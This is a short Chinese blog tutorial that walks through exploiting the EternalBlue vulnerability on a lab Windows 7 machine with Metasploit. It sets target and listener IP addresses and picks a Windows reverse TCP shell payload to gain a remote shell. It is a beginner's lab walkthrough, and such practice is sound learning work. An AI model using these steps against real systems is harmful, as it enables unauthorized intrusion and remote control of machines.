利用metasploit工具 渗透win7

工具：kali linux ，win7 ，一个灵活的头脑

第一次写博客，写的不好请见谅。话不多说，开始。

首先打开metasploit工具，见图

每次打开这个工具大时候欢迎界面都是随机的，大家要注意。
exploits代表渗透模块 auxiliary代表辅助模块 post代表后渗透模块 payload代表攻击模块 encoders代表编码模块 不过常用的就是渗透模块和辅助模块

想必大家都知道永恒之蓝漏洞，我们就用永恒之蓝漏洞来渗透win7。

用search命令，寻找这个漏洞模块如图：

给出了5个攻击模组，前两个是辅助测试的，来让你知道对方ip使用的主机系统及版本
咱们先看第一个。用use命令

再利用show options命令 查看参数。如图可知我们还需要添加rhosts参数。及目标机的ip地址。
目标机的ip地址为：192.168.203.135
使用：set rhosts 192.168.203.135 添加ip地址
然后我们在查看一次参数

我们已经成功添加上了。
然后，使用run命令。查看目标主机的系统和版本号。

如图可知，目标主机的系统是win7家庭专业版。只有一个1个ip。

接下来，就是重头戏了。利用永恒之蓝漏洞渗透win7

利用use命令 选择永恒之蓝

继续添加rhosts
然后添加攻击载荷

挑选攻击载荷。挑选windows/x64/shell/reseves_tcp
然后在添加 主机ip以获得shell 使用set lhost 192.168.203.132添加。
最后 使用run命令 渗透到win7系统

这样 ，就渗透完成了
tips：由于windows和linux使用的编码方式不一样。所以可以使用 chcp 65001命令来转码。
第一次写，欢迎各位大佬批评指正。